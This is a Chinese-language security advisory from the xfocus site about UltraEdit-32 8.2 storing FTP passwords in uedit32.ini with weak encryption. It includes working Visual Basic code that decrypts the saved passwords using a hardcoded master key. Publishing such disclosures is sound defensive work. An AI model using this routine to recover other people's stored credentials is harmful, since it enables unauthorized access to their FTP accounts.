xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version

UltraEdit FTP客户端的密码不够强壮问题


发布时间:2001-08-25
更新时间:2001-08-25
严重程度:
威胁程度:口令恢复
错误类型:设计错误
利用方式:服务器模式

受影响系统
IDM Computer Solutions, Inc UltraEdit-32 8.2
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 3.5
   - Microsoft Windows 2000
详细描述
UltraEdit是一个多功能的文本编辑程序,支持HTML, C/C++, VB,
Java, Perl, XML, 和 C#. 它还包括HEX编辑器和一个小型FTP客户
端程序。其FTP客户端程序有一个功能就是能记忆FTP密码为下一次
再使用,当这样操作时其对密码的加密算法很简单,导致FTP帐户的
密码可恢复。

测试代码
' UltraEdit FTP password decryption (stored in uedit32.ini)
'
' Taken from the help-file:
'
' This checkbox determines if UltraEdit will save the password for later
' reference. If not the user will be prompted for the password as required. Note
' ?if the password is saved it is stored on the system. It is encrypted however
' the encryption mechanism is unsophisticated and should not be relied upon as a
' method of security.

' Masterkey. Taken from the UltraEdt.exe
Private Const Masterkey = "sdfkh we;34u[ jwef "

'Decode a single character
Public Function UEDecode(i_Asc, ByVal i_Pos As Integer)

i_Pos = i_Pos Mod 19
If i_Pos = 0 Then i_Pos = 19

UEDecode = ((Not i_Asc) And Asc(Mid(Masterkey, i_Pos, 1))) + (i_Asc And ((Not Asc(Mid(Masterkey, i_Pos, 1))) And 127))

End Function

'Decode password
Public Function UEDecodeString(str_password As String)

Dim i As Integer

UEDecodeString = ""

For i = 1 To (Len(str_password) / 2)
UEDecodeString = UEDecodeString + Chr$(UEDecode(Val("&H" + Mid(str_password, (2 * (i - 1)) + 1, 2)), i))
Next i

End Function

解决方案
不要使用Ultraedit的FTP客户端程序。

相关信息
"E. van Elk" <evelk@dsv.nl>